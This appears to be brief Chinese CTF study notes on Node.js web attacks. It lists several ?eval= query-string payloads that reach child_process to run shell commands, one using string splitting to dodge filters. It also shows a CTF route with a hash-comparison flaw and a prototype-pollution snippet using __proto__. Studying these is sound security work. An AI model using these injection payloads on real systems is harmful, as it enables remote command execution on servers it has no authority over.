NodeJs 入个门

RCE:

1
2
3
4
5
6
7
8
9
10
?eval=require("child_process").execSync('ls')

?eval=require('child_process').execSync('ls').toString()

?eval=require("child_process")['exe'%2B'cSync']('ls')

?eval=require('child_process').spawnSync( 'ls', [ './' ] ).stdout.toString()

?eval=global.process.mainModule.constructor._load('child_process').execSync('ls')

弱比较:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/* GET home page. */

router.get('/', function(req, res, next) {

  res.type('html');

  var flag='xxxxxxx';

  var a = req.query.a;

  var b = req.query.b;

  if(a && b && a.length===b.length && a!==b && md5(a+flag)===md5(b+flag)){

    res.end(flag);

  }else{

    res.render('index',{ msg: 'tql'});

  }

});

原型链污染

1
2
3
4
let o1 = {} let o2 = JSON.parse('{"a": 1, "__proto__": {"b": 2}}')
merge(o1, o2) 
console.log(o1.a, o1.b)
o3 = {} console.log(o3.b)